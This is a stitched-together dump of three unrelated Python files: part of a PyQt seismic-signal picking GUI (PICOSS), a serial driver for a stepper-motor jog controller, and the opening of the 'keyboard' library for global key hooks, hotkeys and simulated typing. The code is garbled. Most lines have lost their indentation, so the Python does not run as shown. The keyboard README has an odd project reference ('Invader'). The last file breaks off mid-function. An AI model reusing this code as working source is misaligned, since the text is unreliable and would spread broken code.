self.parent().highpass_freq = float(freq_but)
self.parent().prepare_stream()
self.close()
else:
pass
class WindowPicklingFile(QtGui.QMainWindow, DialogPickingFile.Ui_MainWindow):
def __init__(self, parent):
super(WindowPicklingFile, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
# Here, we should add the listener
self.pushButton_4.clicked.connect(self.get_info)
self.pushButton_3.clicked.connect(self.load_pfile)
self.filename = None
self.sta_lta = False
def get_info(self):
if self.filename is None:
self.parent().msg_box("Can not plot without preprocessed file!", "Choose one preprocessed file")
elif self.filename is not None:
self.update_parent_fromText()
self.parent().clean_figures()
self.parent().clean_points()
self.parent().clean_canvas()
self.parent().process_triggerfile(str(self.filename))
self.close()
else:
# In case the file is chosen, we get the attributes we want
self.update_parent_fromText()
self.parent().plot_from_file()
self.close()
def update_parent_fromText(self):
self.parent().station = str(self.station_2.text())
self.parent().channel = str(self.channel_2.text())
self.parent().network = str(self.network_2.text())
self.parent().location = str(self.location_2.text())
self.parent().day_of_the_year = str(self.day_of_the_year.text())
self.parent().trace_loaded_filename = str(self.filename)
def autocomplete(self, string):
arr = string.split("/")[-1].split(".")
        if len(arr) >= 4:
self.network_2.setText(arr[0])
self.station_2.setText(arr[1])
self.channel_2.setText(arr[3])
self.day_of_the_year.setText(arr[-1])
def load_pfile(self):
self.filename = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'picking_data/'))
self.label_filename_2.setText(self.filename)
self.autocomplete(self.filename)
class WindowSaving(QtGui.QMainWindow, DialogSave.Ui_MainWindow):
"""
    Window that handles the options required for saving the data in multiple formats.
    "segmented_data" is given as the default folder, but users can select and move within their own data
structure. Alternatively, other data files can be loaded within the interface.
"""
def __init__(self, parent):
super(WindowSaving, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
# Here, we should add the listener
self.segmentation_table = self.parent().segmentation_table
self.toSave = None
self.filename.setText(str(self.parent().toSave))
self.label_4.setText("segmented_data/")
        # Connect the buttons to their corresponding actions.
self.pushButton.clicked.connect(self.browse)
self.buttonCancel.clicked.connect(self.cancel)
self.buttonSave.clicked.connect(self.save_data)
def browse(self):
"""Function to browse the folder structure to save a specific file"""
destination_folder = str(QtGui.QFileDialog.getExistingDirectory(None, "Select Folder"))
self.label_4.setText(destination_folder)
def cancel(self):
"""Close the interface"""
self.close()
gc.collect()
def save_data(self):
"""save the data within the selected folder"""
destination_folder = str(self.label_4.text())
self.toSave = str(self.filename.text())
data_format = str(self.comboBox.currentText())
gui_functions.save_segmentation_table(destination_folder, self.toSave, data_format, self.segmentation_table)
self.close()
class WindowPickingOnFly(QtGui.QMainWindow, DialogTrigger.Ui_MainWindow):
"""
    Window that handles the computation of STA/LTA triggers, and interfaces with the main GUI with the triggering and
plotting functionalities. Alternatively, other data files can be loaded within the interface.
"""
def __init__(self, parent):
super(WindowPickingOnFly, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
self.buttonComputePlot.clicked.connect(self.compute_plot)
self.buttonCancel.clicked.connect(self.cancel)
self.label_loaded.setText(str(self.parent().trace_loaded_filename))
def compute_plot(self):
# get the data from the parent and compute
new_job = multiprocessing.Process(target=self.parent().clean_figures(), args=())
new_job_main = multiprocessing.Process(target=self.parent().clean_canvas(), args=())
new_job.start()
new_job_main.start()
# Get the info and compute
kind, nlta, nsta, tgon, toff = self.get_info()
trace = self.parent().active_trace.copy() # we copy the data to avoid numerical errors.
data = utils.picos_utils.check_masked_array(trace.data)
cft, on_of = utils.picos_utils.compute_sta_lta(data, self.parent().fm, kind, nlta=nlta,
nsta=nsta, trig_on=tgon, trig_off=toff)
self.parent().plot_trigger(on_of)
self.close()
gc.collect()
def cancel(self):
"""close the window"""
self.close()
gc.collect()
def get_info(self):
"""
Get the information required for the STA/LTA algorithm, along with the type of STA/LTA we want to run
Returns:
kind : str
                The type of STA/LTA trigger we want to use
nlta : float
The length of the LTA window (s)
nsta : float
The length of the STA window (s)
            tgon : float
                The trigger "on" threshold to consider an activation
            toff : float
                The trigger "off" threshold to deactivate the trigger
"""
nlta = float(self.spin_lta.value())
nsta = float(self.spin_sta.value())
tgon = float(self.trigg_on.value())
toff = float(self.trigg_of.value())
kind = str(self.comboTrigger.currentText()).split(" ")[0]
return kind, nlta, nsta, tgon, toff
class WindowVisualizeResults(QtGui.QMainWindow, DialogLoadResults.Ui_MainWindow):
"""
    Window that visualizes the segmented events.
"""
def __init__(self, parent):
super(WindowVisualizeResults, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
# Here, we should add the listener
self.pushButton_4.clicked.connect(self.plot_results)
self.pushButton_5.clicked.connect(self.load_main)
self.pushButton_3.clicked.connect(self.load_results)
self.filename_trace = None
self.filename_results = None
def preprocess_results(self, table):
table = np.asarray([l[:2] for l in table[2:]], dtype=float)
return table
def load_main(self):
self.filename_trace = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'data/'))
self.label_filename_1.setText(self.filename_trace)
def load_results(self):
self.filename_results = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'segmentation_data/'))
self.label_filename_2.setText(self.filename_results)
def plot_results(self):
# get the data from the parent and compute
new_job = multiprocessing.Process(target=self.parent().clean_figures(), args=())
new_job_main = multiprocessing.Process(target=self.parent().clean_canvas(), args=())
new_job.start()
new_job_main.start()
# Get the info and compute
trace = str(self.label_filename_1.text())
print("MAIN RESULTS")
results = str(self.label_filename_2.text())
print("***************")
self.parent().trace_loaded_filename = trace
self.parent().plot_from_file()
array_results = np.load(results)
print(array_results[2:])
on_of = self.preprocess_results(array_results)
self.parent().plot_results_seconds(on_of)
#self.close()
#gc.collect()
def cancel(self):
"""close the window"""
self.close()
gc.collect()
class WindowAmpa(QtGui.QMainWindow, DialogAmpa.Ui_MainWindow):
"""
    Window that handles the computation of the AMPA algorithm, and interfaces with the main GUI with the triggering
    and plotting functionalities. Alternatively, other data files can be loaded within the interface.
"""
def __init__(self, parent):
super(WindowAmpa, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
self.buttonComputePlot.clicked.connect(self.compute_ampa)
self.buttonCancel.clicked.connect(self.cancel)
self.pushButton.clicked.connect(self.add_filter)
self.label_loaded.setText(str(self.parent().trace_loaded_filename))
def compute_ampa(self):
# get the data from the parent and compute
new_job = multiprocessing.Process(target=self.parent().clean_figures(), args=())
new_job_main = multiprocessing.Process(target=self.parent().clean_canvas(), args=())
new_job.start()
new_job_main.start()
self.compute()
def cancel(self):
"""close the window"""
self.close()
gc.collect()
def get_info_ampa(self):
"""
Function that computes the information required for AMPA
Returns:
window : float
Initial frequency for AMPA
overlap : float
End frequency for AMPA
noise : float
The bandwith with the
uvalue : float
Impulssivenes of the filter response
"""
window = float(self.windowAnalysis.value())
overlap = float(self.percOverlap.value())
noise = float(self.spinBox.value())
uvalue = float(self.uValue.value())
return window, overlap, noise, uvalue
def get_info_filters(self):
"""
Function that gets the info of the filters
Returns:
initfreq : float
Initial frequency for AMPA
endfreq : float
End frequency for AMPA
            bandwidth : float
                The bandwidth of each filter
            beta : float
                Impulsiveness of the filter response
L_filters : list
The list of filters we will use
"""
initfreq = float(self.initialfreq.value())
endfreq = float(self.endfreq.value())
bandwidth = float(self.bandWidth.value())
beta = float(self.lcoefficient.value())
L_filters = []
        # we recover the corresponding value. Change this part in the future.
for row in xrange(0, self.tableWidget.rowCount()):
value = str(self.tableWidget.item(row, 0).text())
if gui_functions.check_digits(value):
L_filters.append(value)
return [initfreq, endfreq, bandwidth, beta, L_filters]
def compute(self):
"""Function to link and compute the AMPA method"""
[window, overlap, noise, uvalue] = self.get_info_ampa()
[initfreq, endfreq, bandwidth, beta, L_filters] = self.get_info_filters()
trace = self.parent().active_trace.copy() # we copy the data to avoid numerical errors.
data = utils.picos_utils.check_masked_array(trace.data)
on_of = utils.picos_utils.compute_ampa(data, self.parent().fm, window, bandwidth, initfreq, endfreq, overlap,
noise, uvalue, beta, L_filters)
self.parent().plot_trigger(on_of)
del trace, data
self.close()
def update_rows(self):
numrows = self.tableWidget.rowCount()
new_headers = ["Filter %s" % x for x in xrange(1, numrows)]
self.tableWidget.setVerticalHeaderLabels(new_headers)
def add_filter(self):
row = self.tableWidget.rowCount()
self.tableWidget.insertRow(row)
numrows = self.tableWidget.rowCount()
        self.tableWidget.setItem(numrows - 1, 0, QtGui.QTableWidgetItem("Write value"))
        self.tableWidget.item(numrows - 1, 0).setBackground(QtCore.Qt.green)
self.update_rows()
class WindowFI(QtGui.QMainWindow, DialogFI.Ui_MainWindow):
"""
    Window that handles the computation of the Frequency Index classification from the segmented files. Alternatively,
other data files can be loaded within the interface.
"""
def __init__(self, parent):
super(WindowFI, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
# high and low pass buttons.
self.buttonCancel.clicked.connect(self.cancel)
self.buttonLoad.clicked.connect(self.load_file_segmentation)
self.buttonLoadTrace.clicked.connect(self.load_file_trace)
self.radioButtonMX.clicked.connect(self.enable_hybrids)
self.buttonComputeSave.clicked.connect(self.compute_classification)
self.loadedMaintrace.setText(self.parent().trace_loaded_filename)
self.trace = None
self.filename = None
def compute_classification(self):
"""
        Function that computes the frequency index classification for the
        segmented events and saves the results to disk.
"""
destination_folder = str(QtGui.QFileDialog.getExistingDirectory(None, "Select Folder"))
mu_l = -float(self.mu1.value())
mu_h = float(self.mu2.value())
mu_r = float(self.mu3.value())
hyb = self.get_hybrids()
t_user = 25.0
slider = float(self.sliderFrequency.value())
filename_seg = str(self.loadedsegmentation.text())
filename_trace = str(self.loadedMaintrace.text())
if slider < 2:
gui_functions.msg_box("Frequency Index requires broader frequency span", "Please, select Threshold values")
        elif filename_trace == '' or filename_seg == '':
gui_functions.msg_box("The segmentation table and/or loaded files are required", "Please, load both files")
else:
# Obtain the main trace
self.trace, fm = self.process_data(filename_trace)
segmentation_times = utils.picos_utils.process_segmentation_table(filename_seg)
candidates_segmented, durations = np.asarray(utils.picos_utils.extract_signals(self.trace.data, fm, segmentation_times))
ratios = utils.picos_utils.evaluate_candidates(candidates_segmented, slider, fm)
labels = utils.picos_utils.evaluate_ratios(ratios, durations, thr_dur=t_user, mu_low=mu_l, mu_high=mu_h, mu_rock=mu_r, mixed=hyb)
#
data_toSave = {"segmentation_times": segmentation_times, "labels":labels}
toSave = "%s_FI.p" % filename_trace.split("/")[-1]
utils.picos_utils.save_pickle(destination_folder, toSave, data_toSave)
gc.collect()
self.close()
def cancel(self):
"""close the window"""
self.close()
gc.collect()
def process_data(self, filename_trace):
"""function to process the data or copy from the main trace"""
try:
trace, fm = utils.picos_utils.process_trace(filename_trace, bandpass=[0.5, 20.0])
except:
trace, fm = self.parent().active_trace, self.parent().fm
return trace, fm
def load_file_segmentation(self):
"""function to load the segmentation file"""
self.filename = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'segmented_data/'))
self.loadedsegmentation.setText(self.filename)
def load_file_trace(self):
self.loadedMaintrace.setText(str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'data/')))
def empty_filed(self, val1, val2):
"""
        Function that checks whether the hybrid low and hybrid high values are filled in and numeric.
Args:
val1 : str:
The first value to check
val2 : str
The second value to check
Returns:
            True if both values are non-empty and numeric, False otherwise.
"""
cond1 = gui_functions.check_emptiness(val1) and gui_functions.check_emptiness(val2)
cond2 = gui_functions.check_digits(val1) and gui_functions.check_digits(val2)
return cond1 and cond2
def get_hybrids(self):
"""
        Function that gets the hybrid threshold information.
"""
mu_hybrid_l = str(self.hybridlow.text())
mu_hybrid_h = str(self.hybridhigh.text())
L = None
if self.radioButtonMX.isChecked() and self.empty_filed(mu_hybrid_l, mu_hybrid_h):
            L = [float(mu_hybrid_l), float(mu_hybrid_h)]
return L
def enable_hybrids(self):
"""Function to enable the hybrids frequency classification"""
if self.radioButtonMX.isChecked():
self.hybridhigh.setEnabled(True)
self.hybridlow.setEnabled(True)
else:
self.hybridhigh.setEnabled(False)
self.hybridlow.setEnabled(False)
|
motorbackend.py
|
from serial import Serial
from threading import Thread, Lock
class DaisyDriver(Serial):
    def __init__(self, connected=True):
# check for connection bool to allow for dummy DaisyDriver object
# if not connected
if connected:
# initialise DaisyDriver serial object (hard code serial address for now)
super(DaisyDriver, self).__init__('/dev/ttyACM0')
# set initial speed (0,1,2 for low,medium,high respectively)
self.speedset(2)
# initialise jog lock
self.joglock = Lock()
# initialise direction dictionary, f = forward, fl = forward left etc...
self.directions = {'l':(0, -1, 0),
'r':(0, 1, 0),
'f':(-1, 0, 0),
'fl':(-1, -1, 0),
'fr':(-1, 1, 0),
'b':(1, 0, 0),
'bl':(1, -1, 0),
'br':(1, 1, 0),
'u':(0, 0, -1),
'd':(0, 0, 1)}
elif not connected:
# just set default speedval for slider to read
self.speedval = 2
def speedset(self, val):
# speed val
self.speedval = val
# value from slider equals 0, 1 or 2. Use list for converting
# slider index to step motor speed
speeds = [50, 275, 500]
# serial command
command = 'STV 0 {V} {V} {V} \r'.format(V=speeds[self.speedval])
# convert to byte string
bytes_command = command.encode('utf-8')
# write command
self.write(bytes_command)
# flush buffer
self.flush()
def __jogdo(self, x, y, z):
# enable lock
with self.joglock:
# flush buffer
self.flush()
# serial command
command = 'JOG 0 {x_} {y_} {z_} \r'.format(x_=x, y_=y, z_=z)
# convert to byte string
bytes_command = command.encode('utf-8')
# write command
self.write(bytes_command)
# read finish statement and print
self.readline()
def __jog(self, x, y, z, button_handle):
# count, button status dependent
count = 0
# upper limit on jog repeats
        while count < 1000:
            if count == 0:
                self.__jogdo(x, y, z)
            elif button_handle.isDown():
                self.__jogdo(x, y, z)
            count += 1
def jog(self, direction, button_handle):
# if not locked then jog
if not self.joglock.locked():
# get direction vector
dir_tuple = self.directions[direction]
# start jog
jogthread = Thread(target=self.__jog, args=(*dir_tuple, button_handle))
jogthread.start()
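# Example usage (a sketch; assumes the controller answers on /dev/ttyACM0 and
# that `button` is a Qt-style handle exposing isDown()):
#
#   driver = DaisyDriver()
#   driver.speedset(1)         # medium speed
#   driver.jog('fl', button)   # jog forward-left while the button is held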
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
keyboard
========
Take full control of your keyboard with this small Python library. Hook global events, register hotkeys, simulate key presses and much more.
## Features
- Global event hook on all keyboards (captures keys regardless of focus).
- **Listen** and **sends** keyboard events.
- Works with **Windows** and **Linux** (requires sudo), with experimental **OS X** support (thanks @glitchassassin!).
- **Pure Python**, no C modules to be compiled.
- **Zero dependencies**. Trivial to install and deploy, just copy the files.
- **Python 2 and 3**.
- Complex hotkey support (e.g. `Ctrl+Shift+M, Ctrl+Space`) with controllable timeout.
- Includes **high level API** (e.g. [record](#keyboard.record) and [play](#keyboard.play), [add_abbreviation](#keyboard.add_abbreviation)).
- Maps keys as they actually are in your layout, with **full internationalization support** (e.g. `Ctrl+ç`).
- Events automatically captured in separate thread, doesn't block main program.
- Tested and documented.
- Doesn't break accented dead keys (I'm looking at you, pyHook).
- Invader support available via project [Invader](https://github.com/boppreh/Invader) (`pip install Invader`).
This program makes no attempt to hide itself, so don't use it for keyloggers.
## Usage
Install the [PyPI package](https://pypi.python.org/pypi/keyboard/):
$ sudo pip install keyboard
or clone the repository (no installation required, source files are sufficient):
$ git clone https://github.com/boppreh/keyboard
Then check the [API docs](https://github.com/boppreh/keyboard#api) to see what features are available.
## Example
```
import keyboard
keyboard.press_and_release('shift+s, space')
keyboard.write('The quick brown fox jumps over the lazy dog.')
# Press PAGE UP then PAGE DOWN to type "foobar".
keyboard.add_hotkey('page up, page down', lambda: keyboard.write('foobar'))
# Blocks until you press esc.
keyboard.wait('esc')
# Record events until 'esc' is pressed.
recorded = keyboard.record(until='esc')
# Then replay back at three times the speed.
keyboard.play(recorded, speed_factor=3)
# Type @@ then press space to replace with abbreviation.
keyboard.add_abbreviation('@@', 'my.long.email@example.com')
# Block forever.
keyboard.wait()
```
## Known limitations:
- Events generated under Windows don't report device id (`event.device == None`). [#21](https://github.com/boppreh/keyboard/issues/21)
- Linux doesn't seem to report media keys. [#20](https://github.com/boppreh/keyboard/issues/20)
- Currently no way to suppress keys ('catch' events and block them). [#22](https://github.com/boppreh/keyboard/issues/22)
- To avoid depending on X, the Linux part reads raw device files (`/dev/input/input*`),
but this requires root.
- Other applications, such as some games, may register hooks that swallow all
key events. In this case `keyboard` will be unable to report events.
"""
import time as _time
from threading import Thread as _Thread
from ._keyboard_event import KeyboardEvent
from ._suppress import KeyTable as _KeyTable
try:
# Python2
long, basestring
is_str = lambda x: isinstance(x, basestring)
is_number = lambda x: isinstance(x, (int, long))
import Queue as queue
except NameError:
# Python3
is_str = lambda x: isinstance(x, str)
is_number = lambda x: isinstance(x, int)
import queue
# Just a dynamic object to store attributes for the closures.
class _State(object): pass
import platform as _platform
if _platform.system() == 'Windows':
    from . import _winkeyboard as _os_keyboard
elif _platform.system() == 'Linux':
    from . import _nixkeyboard as _os_keyboard
elif _platform.system() == 'Darwin':
    from . import _darwinkeyboard as _os_keyboard
else:
raise OSError("Unsupported platform '{}'".format(_platform.system()))
from ._keyboard_event import KEY_DOWN, KEY_UP
from ._keyboard_event import normalize_name as _normalize_name
from ._generic import GenericListener as _GenericListener
all_modifiers = ('alt', 'alt gr', 'ctrl', 'shift', 'win')
_pressed_events = {}
class _KeyboardListener(_GenericListener):
def init(self):
_os_keyboard.init()
def pre_process_event(self, event):
if not event.scan_code and event.name == 'unknown':
return False
# Useful for media keys, which are reported with scan_code = 0.
if not event.scan_code:
event.scan_code = to_scan_code(event.name)
if event.event_type == KEY_UP:
if event.scan_code in _pressed_events:
del _pressed_events[event.scan_code]
else:
_pressed_events[event.scan_code] = event
if not _pressed_events:
_key_table.complete_sequence()
return True
def listen(self):
_os_keyboard.listen(self.queue, _key_table.is_allowed)
_listener = _KeyboardListener()
def matches(event, name):
"""
Returns True if the given event represents the same key as the one given in
`name`.
"""
if is_number(name):
return event.scan_code == name
normalized = _normalize_name(name)
matched_name = (
normalized == event.name
or 'left ' + normalized == event.name
or 'right ' + normalized == event.name
)
return matched_name or _os_keyboard.map_char(normalized)[0] == event.scan_code
def is_pressed(key):
"""
Returns True if the key is pressed.
is_pressed(57) -> True
is_pressed('space') -> True
is_pressed('ctrl+space') -> True
"""
_listener.start_if_necessary()
if is_number(key):
return key in _pressed_events
elif len(key) > 1 and ('+' in key or ',' in key):
parts = canonicalize(key)
if len(parts) > 1:
raise ValueError('Cannot check status of multi-step combination ({}).'.format(key))
return all(is_pressed(part) for part in parts[0])
else:
for event in _pressed_events.values():
if matches(event, key):
return True
return False
def canonicalize(hotkey):
"""
Splits a user provided hotkey into a list of steps, each one made of a list
of scan codes or names. Used to normalize input at the API boundary. When a
combo is given (e.g. 'ctrl + a, b') spaces are ignored.
canonicalize(57) -> [[57]]
canonicalize([[57]]) -> [[57]]
canonicalize('space') -> [['space']]
canonicalize('ctrl+space') -> [['ctrl', 'space']]
canonicalize('ctrl+space, space') -> [['ctrl', 'space'], ['space']]
Note we must not convert names into scan codes because a name may represent
more than one physical key (e.g. two 'ctrl' keys).
"""
if isinstance(hotkey, list) and all(isinstance(step, list) for step in hotkey):
# Already canonicalized, nothing to do.
return hotkey
elif is_number(hotkey):
return [[hotkey]]
if not is_str(hotkey):
raise ValueError('Unexpected hotkey: {}. Expected int scan code, str key combination or normalized hotkey.'.format(hotkey))
if len(hotkey) == 1 or ('+' not in hotkey and ',' not in hotkey):
return [[_normalize_name(hotkey)]]
else:
steps = []
for str_step in hotkey.split(','):
steps.append([])
for part in str_step.split('+'):
steps[-1].append(_normalize_name(part.strip()))
return steps
def call_later(fn, args=(), delay=0.001):
"""
Calls the provided function in a new thread after waiting some time.
Useful for giving the system some time to process an event, without blocking
the current execution flow.
"""
_Thread(target=lambda: _time.sleep(delay) or fn(*args)).start()
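# Illustrative usage sketch (added for clarity; not part of the original
# module): `call_later` lets a key be released shortly after it is pressed
# without blocking the caller. Never invoked at import time.
def _example_call_later():
    press('shift')
    call_later(release, args=('shift',), delay=0.05)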
def _suppress_hotkey(steps, timeout):
"""
Adds a hotkey to the list of keys to be suppressed.
To unsuppress all hotkeys use `clear_all_hotkeys()`.
"""
_key_table.suppress_sequence(steps, timeout)
_hotkeys = {}
_hotkeys_suppressed = {}
def clear_all_hotkeys():
"""
Removes all hotkey handlers. Note some functions such as 'wait' and 'record'
internally use hotkeys and will be affected by this call.
Abbreviations and word listeners are not hotkeys and therefore not affected.
To remove all hooks use `unhook_all()`.
"""
for handler in _hotkeys.values():
unhook(handler)
_hotkeys.clear()
_key_table.suppress_none()
_hotkeys_suppressed.clear()
# Alias.
remove_all_hotkeys = clear_all_hotkeys
def add_hotkey(hotkey, callback, args=(), suppress=False, timeout=1, trigger_on_release=False):
"""
Invokes a callback every time a key combination is pressed. The hotkey must
be in the format "ctrl+shift+a, s". This would trigger when the user holds
ctrl, shift and "a" at once, releases, and then presses "s". To represent
literal commas, pluses and spaces use their names ('comma', 'plus',
'space').
    - `args` is an optional list of arguments to be passed to the callback during
    each invocation.
    - `suppress` defines if it should block processing other hotkeys after
a match is found. Currently Windows-only.
    - `timeout` is the amount of seconds allowed to pass between key presses
    before the combination state is reset.
- `trigger_on_release` if true, the callback is invoked on key release instead
of key press.
The event handler function is returned. To remove a hotkey call
`remove_hotkey(hotkey)` or `remove_hotkey(handler)`.
Note: hotkeys are activated when the last key is *pressed*, not released.
Note: the callback is executed in a separate thread, asynchronously. For an
example of how to use a callback synchronously, see `wait`.
add_hotkey(57, print, args=['space was pressed'])
add_hotkey(' ', print, args=['space was pressed'])
add_hotkey('space', print, args=['space was pressed'])
add_hotkey('Space', print, args=['space was pressed'])
add_hotkey('ctrl+q', quit)
add_hotkey('ctrl+alt+enter, space', some_callback)
"""
steps = canonicalize(hotkey)
state = _State()
state.step = 0
state.time = _time.time()
def handler(event):
if event.event_type == KEY_UP:
if trigger_on_release and state.step == len(steps):
state.step = 0
callback(*args)
return suppress
return
# Just waiting for the user to release a key.
if trigger_on_release and state.step >= len(steps):
return
timed_out = state.step > 0 and timeout and event.time - state.time > timeout
unexpected = not any(matches(event, part) for part in steps[state.step])
if unexpected or timed_out:
if state.step > 0:
state.step = 0
# Could be start of hotkey again.
handler(event)
else:
state.step = 0
else:
state.time = event.time
if _step_is_pressed(steps[state.step]) or all(matches(event, part) for part in steps[state.step]):
state.step += 1
if not trigger_on_release and state.step == len(steps):
state.step = 0
callback(*args)
return suppress
_hotkeys[hotkey] = handler
if suppress:
_suppress_hotkey(steps, timeout)
_hotkeys_suppressed[hotkey] = timeout
return hook(handler)
# Alias.
register_hotkey = add_hotkey
def _step_is_pressed(step):
"""
Returns True if:
- all keys within the step are currently pressed
    - no modifiers outside the step are currently pressed
"""
    inactive_modifiers = [modifier for modifier in all_modifiers if modifier not in step]
return all(is_pressed(x) for x in step) and not any(is_pressed(x) for x in inactive_modifiers)
def hook(callback):
"""
Installs a global listener on all available keyboards, invoking `callback`
each time a key is pressed or released.
The event passed to the callback is of type `keyboard.KeyboardEvent`,
with the following attributes:
    - `name`: a Unicode representation of the character (e.g. "&") or
description (e.g. "space"). The name is always lower-case.
- `scan_code`: number representing the physical key, e.g. 55.
- `time`: timestamp of the time the event occurred, with as much precision
as given by the OS.
Returns the given callback for easier development.
"""
_listener.add_handler(callback)
return callback
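# Illustrative usage sketch (not part of the original module): a hook callback
# that logs every event, removed once escape is pressed. Never invoked at
# import time.
def _example_hook():
    def log_event(event):
        print('%s %s (scan code %s)' % (event.event_type, event.name, event.scan_code))
    hook(log_event)
    wait('escape')
    unhook(log_event)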
def unhook(callback):
""" Removes a previously hooked callback. """
_listener.remove_handler(callback)
def unhook_all():
"""
Removes all keyboard hooks in use, including hotkeys, abbreviations, word
listeners, `record`ers and `wait`s.
"""
_hotkeys.clear()
_word_listeners.clear()
del _listener.handlers[:]
def hook_key(key, keydown_callback=lambda: None, keyup_callback=lambda: None):
"""
Hooks key up and key down events for a single key. Returns the event handler
created. To remove a hooked key use `unhook_key(key)` or
`unhook_key(handler)`.
    Note: this function shares state with hotkeys, so `clear_all_hotkeys`
    affects it as well.
"""
def handler(event):
if not matches(event, key):
return
if event.event_type == KEY_DOWN:
keydown_callback()
if event.event_type == KEY_UP:
keyup_callback()
_hotkeys[key] = handler
return hook(handler)
def on_press(callback):
"""
Invokes `callback` for every KEY_DOWN event. For details see `hook`.
"""
return hook(lambda e: e.event_type == KEY_DOWN and callback(e))
def on_release(callback):
"""
Invokes `callback` for every KEY_UP event. For details see `hook`.
"""
return hook(lambda e: e.event_type == KEY_UP and callback(e))
def _remove_named_hook(name_or_handler, names):
"""
Removes a hook that was registered with a given name in a dictionary.
"""
if callable(name_or_handler):
handler = name_or_handler
try:
name = next(n for n, h in names.items() if h == handler)
except StopIteration:
raise ValueError('This handler is not associated with any name.')
unhook(handler)
del names[name]
else:
name = name_or_handler
try:
handler = names[name]
except KeyError as e:
raise ValueError('No such named listener: ' + repr(name), e)
unhook(names[name])
del names[name]
return name
def remove_hotkey(hotkey_or_handler):
"""
Removes a previously registered hotkey. Accepts either the hotkey used
during registration (exact string) or the event handler returned by the
`add_hotkey` or `hook_key` functions.
"""
name = _remove_named_hook(hotkey_or_handler, _hotkeys)
if name in _hotkeys_suppressed:
del _hotkeys_suppressed[name]
# because the table structure is optimized for runtime, we must recompile
_key_table.suppress_none()
for current_name in _hotkeys_suppressed:
_suppress_hotkey(canonicalize(current_name), _hotkeys_suppressed[current_name])
# Alias.
unhook_key = remove_hotkey
_word_listeners = {}
def add_word_listener(word, callback, triggers=['space'], match_suffix=False, timeout=2):
"""
Invokes a callback every time a sequence of characters is typed (e.g. 'pet')
and followed by a trigger key (e.g. space). Modifiers (e.g. alt, ctrl,
shift) are ignored.
- `word` the typed text to be matched. E.g. 'pet'.
- `callback` is an argument-less function to be invoked each time the word
is typed.
- `triggers` is the list of keys that will cause a match to be checked. If
the user presses some key that is not a character (len>1) and not in
triggers, the characters so far will be discarded. By default only space
bar triggers match checks.
- `match_suffix` defines if endings of words should also be checked instead
of only whole words. E.g. if true, typing 'carpet'+space will trigger the
listener for 'pet'. Defaults to false, only whole words are checked.
- `timeout` is the maximum number of seconds between typed characters before
the current word is discarded. Defaults to 2 seconds.
Returns the event handler created. To remove a word listener use
`remove_word_listener(word)` or `remove_word_listener(handler)`.
Note: all actions are performed on key down. Key up events are ignored.
    Note: word matches are **case sensitive**.
"""
if word in _word_listeners:
raise ValueError('Already listening for word {}'.format(repr(word)))
state = _State()
state.current = ''
state.time = _time.time()
def handler(event):
name = event.name
if event.event_type == KEY_UP or name in all_modifiers: return
matched = state.current == word or (match_suffix and state.current.endswith(word))
if name in triggers and matched:
callback()
state.current = ''
elif len(name) > 1:
state.current = ''
else:
if timeout and event.time - state.time > timeout:
state.current = ''
state.time = event.time
state.current += name if not is_pressed('shift') else name.upper()
_word_listeners[word] = hook(handler)
return handler
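# Illustrative usage sketch (not part of the original module): react to the
# word 'pet' being typed followed by a trigger key. Never invoked at import
# time.
def _example_word_listener():
    def on_pet():
        write(' (a word listener saw that)')
    handler = add_word_listener('pet', on_pet)
    wait('escape')
    remove_word_listener(handler)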
def remove_word_listener(word_or_handler):
"""
Removes a previously registered word listener. Accepts either the word used
during registration (exact string) or the event handler returned by the
`add_word_listener` or `add_abbreviation` functions.
"""
_remove_named_hook(word_or_handler, _word_listeners)
def add_abbreviation(source_text, replacement_text, match_suffix=False, timeout=2):
"""
Registers a hotkey that replaces one typed text with another. For example
add_abbreviation('tm', u'™')
Replaces every "tm" followed by a space with a ™ symbol (and no space). The
replacement is done by sending backspace events.
- `match_suffix` defines if endings of words should also be checked instead
of only whole words. E.g. if true, typing 'carpet'+space will trigger the
listener for 'pet'. Defaults to false, only whole words are checked.
- `timeout` is the maximum number of seconds between typed characters before
the current word is discarded. Defaults to 2 seconds.
For more details see `add_word_listener`.
"""
replacement = '\b'*(len(source_text)+1) + replacement_text
callback = lambda: write(replacement, restore_state_after=False)
return add_word_listener(source_text, callback, match_suffix=match_suffix, timeout=timeout)
# Aliases.
register_word_listener = add_word_listener
register_abbreviation = add_abbreviation
remove_abbreviation = remove_word_listener
def stash_state():
"""
Builds a list of all currently pressed scan codes, releases them and returns
the list. Pairs well with `restore_state`.
"""
state = sorted(_pressed_events)
for scan_code in state:
_os_keyboard.release(scan_code)
return state
def restore_state(scan_codes):
"""
Given a list of scan_codes ensures these keys, and only these keys, are
pressed. Pairs well with `stash_state`.
"""
current = set(_pressed_events)
target = set(scan_codes)
for scan_code in current - target:
_os_keyboard.release(scan_code)
for scan_code in target - current:
_os_keyboard.press(scan_code)
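# Illustrative usage sketch (not part of the original module): neutralize the
# user's pressed keys around a synthetic combination, as `write` and `remap`
# do internally. Never invoked at import time.
def _example_stash_restore():
    state = stash_state()        # release whatever the user is holding
    press_and_release('ctrl+s')  # send a clean combination
    restore_state(state)         # re-press the keys released above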
def write(text, delay=0, restore_state_after=True, exact=False):
"""
Sends artificial keyboard events to the OS, simulating the typing of a given
text. Characters not available on the keyboard are typed as explicit unicode
characters using OS-specific functionality, such as alt+codepoint.
To ensure text integrity all currently pressed keys are released before
the text is typed.
- `delay` is the number of seconds to wait between keypresses, defaults to
no delay.
- `restore_state_after` can be used to restore the state of pressed keys
after the text is typed, i.e. presses the keys that were released at the
beginning. Defaults to True.
- `exact` forces typing all characters as explicit unicode (e.g. alt+codepoint)
"""
state = stash_state()
if exact:
for letter in text:
_os_keyboard.type_unicode(letter)
if delay: _time.sleep(delay)
else:
for letter in text:
try:
if letter in '\n\b\t ':
letter = _normalize_name(letter)
scan_code, modifiers = _os_keyboard.map_char(letter)
if is_pressed(scan_code):
